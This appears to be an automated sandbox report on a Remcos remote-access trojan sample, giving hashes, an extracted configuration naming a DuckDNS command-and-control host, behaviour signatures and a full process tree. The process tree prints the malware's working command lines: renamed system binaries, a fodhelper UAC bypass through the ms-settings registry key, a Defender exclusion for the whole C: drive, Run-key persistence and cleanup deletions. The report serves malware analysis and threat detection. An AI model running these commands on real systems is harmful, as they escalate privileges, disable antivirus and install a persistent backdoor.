Analysis
-
max time kernel
146s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
25-07-2024 08:12
Static task
static1
Behavioral task
behavioral1
Sample
MalwareBazaar.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
MalwareBazaar.exe
Resource
win10v2004-20240709-en
General
-
Target
MalwareBazaar.exe
-
Size
1.0MB
-
MD5
04796f12ce53740c4c23b68d2ad1918e
-
SHA1
b9756f279781b5c2ccf0ecf9cca6f260b63d7f51
-
SHA256
09319f07c4b99a145ac12b7339445f6c6493db1c28a592acb32ae464a6d32c13
-
SHA512
57e41e454262633d501ef3e63f4a137f4d570c6c76a2481dd67e794dc318e197450d2548491d5122d822d4fbed4a4313ff504176f17a48cbb0b77a9210d3b8ce
-
SSDEEP
24576:E6Dlm/atGKanKxvdwEHfZTX0u/nJaRj9yin1mV/aJscLa:DDcCZfx+GQRjj1mJ
Malware Config
Extracted
remcos
RemoteHost
127.0.0.1:59321
nnamoo.duckdns.org:59321
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-S35D6F
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Executes dropped EXE 19 IoCs
Processes:
ovzfjkkH.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exepid process 3024 ovzfjkkH.pif 1492 alpha.exe 816 alpha.exe 2408 alpha.exe 2948 alpha.exe 824 alpha.exe 2556 alpha.exe 2812 xkn.exe 1348 alpha.exe 1476 ger.exe 2324 alpha.exe 2120 alpha.exe 2096 alpha.exe 2292 alpha.exe 1792 alpha.exe 2300 alpha.exe 2336 alpha.exe 1812 alpha.exe 2768 alpha.exe -
Loads dropped DLL 10 IoCs
Processes:
MalwareBazaar.execmd.exealpha.exexkn.exealpha.exepid process 2676 MalwareBazaar.exe 2676 MalwareBazaar.exe 2468 cmd.exe 2468 cmd.exe 2468 cmd.exe 2468 cmd.exe 2556 alpha.exe 2812 xkn.exe 2812 xkn.exe 1348 alpha.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
MalwareBazaar.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Hkkjfzvo = "C:\\Users\\Public\\Hkkjfzvo.url" MalwareBazaar.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
MalwareBazaar.exedescription pid process target process PID 2676 set thread context of 3024 2676 MalwareBazaar.exe ovzfjkkH.pif -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
MalwareBazaar.exeovzfjkkH.pifextrac32.exeSndVol.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MalwareBazaar.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ovzfjkkH.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SndVol.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
alpha.exePING.EXEpid process 2120 alpha.exe 2016 PING.EXE -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2140 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
ger.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\ms-settings\shell ger.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
xkn.exeMalwareBazaar.exepid process 2812 xkn.exe 2676 MalwareBazaar.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
xkn.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2812 xkn.exe Token: SeDebugPrivilege 2140 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
SndVol.exepid process 1208 SndVol.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
SndVol.exepid process 1208 SndVol.exe 1208 SndVol.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
MalwareBazaar.exeovzfjkkH.pifcmd.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exedescription pid process target process PID 2676 wrote to memory of 3024 2676 MalwareBazaar.exe ovzfjkkH.pif PID 2676 wrote to memory of 3024 2676 MalwareBazaar.exe ovzfjkkH.pif PID 2676 wrote to memory of 3024 2676 MalwareBazaar.exe ovzfjkkH.pif PID 2676 wrote to memory of 3024 2676 MalwareBazaar.exe ovzfjkkH.pif PID 2676 wrote to memory of 3024 2676 MalwareBazaar.exe ovzfjkkH.pif PID 2676 wrote to memory of 3024 2676 MalwareBazaar.exe ovzfjkkH.pif PID 3024 wrote to memory of 2468 3024 ovzfjkkH.pif cmd.exe PID 3024 wrote to memory of 2468 3024 ovzfjkkH.pif cmd.exe PID 3024 wrote to memory of 2468 3024 ovzfjkkH.pif cmd.exe PID 3024 wrote to memory of 2468 3024 ovzfjkkH.pif cmd.exe PID 2468 wrote to memory of 2848 2468 cmd.exe extrac32.exe PID 2468 wrote to memory of 2848 2468 cmd.exe extrac32.exe PID 2468 wrote to memory of 2848 2468 cmd.exe extrac32.exe PID 2468 wrote to memory of 1492 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 1492 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 1492 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 816 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 816 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 816 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 2408 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 2408 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 2408 2468 cmd.exe alpha.exe PID 2408 wrote to memory of 1952 2408 alpha.exe extrac32.exe PID 2408 wrote to memory of 1952 2408 alpha.exe extrac32.exe PID 2408 wrote to memory of 1952 2408 alpha.exe extrac32.exe PID 2468 wrote to memory of 2948 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 2948 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 2948 2468 cmd.exe alpha.exe PID 2948 wrote to memory of 1708 2948 alpha.exe extrac32.exe PID 2948 wrote to memory of 1708 2948 alpha.exe extrac32.exe PID 2948 wrote to memory of 1708 2948 alpha.exe extrac32.exe PID 2468 wrote to memory of 824 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 824 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 824 2468 cmd.exe alpha.exe PID 824 wrote to memory of 1468 824 alpha.exe extrac32.exe PID 824 wrote to memory of 1468 824 alpha.exe extrac32.exe PID 824 wrote to memory of 1468 824 alpha.exe extrac32.exe PID 2468 wrote to memory of 2556 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 2556 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 2556 2468 cmd.exe alpha.exe PID 2556 wrote to memory of 2812 2556 alpha.exe xkn.exe PID 2556 wrote to memory of 2812 2556 alpha.exe xkn.exe PID 2556 wrote to memory of 2812 2556 alpha.exe xkn.exe PID 2812 wrote to memory of 1348 2812 xkn.exe alpha.exe PID 2812 wrote to memory of 1348 2812 xkn.exe alpha.exe PID 2812 wrote to memory of 1348 2812 xkn.exe alpha.exe PID 1348 wrote to memory of 1476 1348 alpha.exe ger.exe PID 1348 wrote to memory of 1476 1348 alpha.exe ger.exe PID 1348 wrote to memory of 1476 1348 alpha.exe ger.exe PID 2468 wrote to memory of 2324 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 2324 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 2324 2468 cmd.exe alpha.exe PID 2324 wrote to memory of 2140 2324 alpha.exe taskkill.exe PID 2324 wrote to memory of 2140 2324 alpha.exe taskkill.exe PID 2324 wrote to memory of 2140 2324 alpha.exe taskkill.exe PID 2468 wrote to memory of 2120 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 2120 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 2120 2468 cmd.exe alpha.exe PID 2120 wrote to memory of 2016 2120 alpha.exe PING.EXE PID 2120 wrote to memory of 2016 2120 alpha.exe PING.EXE PID 2120 wrote to memory of 2016 2120 alpha.exe PING.EXE PID 2468 wrote to memory of 2096 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 2096 2468 cmd.exe alpha.exe PID 2468 wrote to memory of 2096 2468 cmd.exe alpha.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Users\Public\Libraries\ovzfjkkH.pifC:\Users\Public\Libraries\ovzfjkkH.pif2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7B86.tmp\7B87.tmp\7B88.bat C:\Users\Public\Libraries\ovzfjkkH.pif"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"4⤵PID:2848
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "4⤵
- Executes dropped EXE
PID:1492 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"4⤵
- Executes dropped EXE
PID:816 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"5⤵PID:1952
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"5⤵PID:1708
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:824 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"5⤵PID:1468
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""7⤵
- Executes dropped EXE
- Modifies registry class
PID:1476 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2140 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 24⤵
- Executes dropped EXE
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 25⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2016 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"4⤵
- Executes dropped EXE
PID:2096 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"4⤵
- Executes dropped EXE
PID:2292 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"4⤵
- Executes dropped EXE
PID:1792 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:2300 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:2336 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:1812 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S4⤵
- Executes dropped EXE
PID:2768 -
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe C:\\Users\\Public\\Libraries\\Hkkjfzvo.PIF2⤵
- System Location Discovery: System Language Discovery
PID:2084 -
C:\Windows\SysWOW64\SndVol.exeC:\Windows\System32\SndVol.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1208
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5e62f427202d3e5a3ba60ebe78567918c
SHA16ef0cd5ba6c871815fceb27ff095a7931452b334
SHA25606bee225a830ea0e67b91fd7d24280c5315ef82049b25b07c9cfde4e36a639ff
SHA512e15148ba4099f3b8c73319be32a5f76226d21e7fb90123bec68e5106d03b7d3e8af8caa0421667920967e8921787ba255dc4bf23d35792bf8e9a20f1e18283c6
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
73KB
MD59d0b3066fe3d1fd345e86bc7bcced9e4
SHA1e05984a6671fcfecbc465e613d72d42bda35fd90
SHA2564e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e
SHA512d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d